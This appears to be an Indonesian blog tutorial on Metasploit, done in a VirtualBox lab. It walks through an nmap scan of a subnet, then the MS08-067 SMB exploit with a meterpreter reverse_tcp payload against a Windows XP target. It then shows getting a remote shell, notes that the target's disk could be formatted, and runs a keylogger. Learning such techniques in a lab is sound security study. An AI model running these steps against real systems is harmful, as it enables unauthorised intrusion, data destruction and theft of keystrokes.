Metasploit
adalah salah satu tools untuk mengekploitasi celah keamanan dari sebuah
sistem operasi. Metasploit adalah sebuah framework yang diciptakan
dengan bahasa pemrograman ruby. Metasploit dapat di download di situs
resminya yaitu http://www.metasploit.com.
Untuk mengetahui lebih jelas dan juga lebih mendalam saya sangat
menganjurkan anda bisa mengunjungi sebuah situs apabila anda ingin
belajar tentang metasploit yaitu di : http://www.offensive-security.com/metasploit-unleashed/.
Disini kita akan belajar mengetahui salah satu celah keamanan sistem
operasi win***s. Kenapa kita membahas win***s ??? karena banyak celah
yang bisa diexploitasi :-P
Metasploit
mempunyai 3 macam interface untuk saat ini : console, gui, dan juga
cli. Untuk kali ini kita akan membahas tentang metasploit dengan
interface console. Kenapa console....??? karena dia lebih powerful.
Untuk OS yang saya gunakan saat ini untuk belajar metasploit adalah
menggunakan ubuntu linux 10.04, tapi untuk teman-teman yang menggunakan
win***s jangan kecewa terlebih dahulu karena metasploit juga support
untuk OS windows, dan cara menggunakannyapun pada prinsipnya adalah
sama saja.
Okay....
so... let's go to the point..... Disini kita akan mencari celah
keamanan dari keluarga win***s, untuk praktek kali ini saya menggunakan
win***s xp sebagai komputer target, karena win***s xp paling banyak di
gunakan untuk saat ini. Persiapan yang perlu kita lakukan :
1. Scan ip address computer target untuk mengetahui port berapa saja yang terbuka dengan cara seperti dibawah ini (saya menggunakan nmap) :
1. Scan ip address computer target untuk mengetahui port berapa saja yang terbuka dengan cara seperti dibawah ini (saya menggunakan nmap) :
(disini saya menggunakan virtual box)
terlihat
ip addreas saya adalah 192.168.56.1, lalu kita scan jaringan dari
alamat 192.168.56.2 sampai 192.168.56.105 dengan menggunakan nmap
dengan mengetikkan :
nmap -T4 -O 192.168.56.2-105. Hasilnya akan terlihat kira – kira seperti dibawah ini :
disini terlihat port 445 terbuka. Port ini lah yang akan kita exploitasi.
Port
445 terbuka karena kita mengaktifkan "file and printer sharing".
Kebanyakan perusahaan sering mengaktifkan hal ini, dan ini adalah
sangat riskan sekali bila kita kurang mengerti tentang bahayanya
apabila port 445 tidak kita filter.
- Kita buka terminal di linux lalu masuk sebagai root dengan mengetikkan sudo su lalu tekan enter kemudian ketikkan password anda.
- Setelah itu ketikkan msfconsole lalu akan muncul tampilan seperti dibawah ini :
Hal yang perlu dilakukan untuk menjalankan metasploit adalah :
a. use
b. set payloads
c. set
d. exploit
1.
use exploits => untuk melihat exploits yang ada ketikan show exploit
lalu tekan enter untuk port 445 kita akan menggunakan exploit yaitu
windows/smb/ms08_067_netapi
2.
set payloads => untuk melihat payloads yang ada ketikan show
payloads lalu tekan enter payloads yang kita gunakan adalah
windows/meterpreter/reverse_tcp
3.
set options => untuk melihat options yang ada ketikan show options
lalu tekan enter rhost (ip target →192.168.56.101) masih kosong, jadi
harus di set
check apakah rhost sudah terisi dengan perintah show options.
4. exploit => ketikkan exploit dan biarkan metasploit bekerja..... :) apabila success akan seperti gambar dibawah ini :
Setelah exploit berhasil kita bisa mengetikan help atau bisa juga ? Lalu tekan enter
Banyak
sekali command atau perintah yang bisa kita gunakan disitu. Salah satu
perintah yang bisa kita gunakan adalah perintah shell => untuk masuk
command prompt win***s
kita
bisa melakukan apa saja lewat command prompt termasuk untuk format
hardisk komputer target. => disini kita cuma belajar, jadi jangan
dilakukan di dunia nyata yach....
selain itu kita bisa juga menggunakan keyloger untuk mengetahui apa saja yang diketik di komputer target :
untuk
perintah-perintah yang lain anda bisa mencoba bereksplorasi sendiri....
atau bisa menanyakan sama “SI MBAH” => mbah google maksudnya :-D
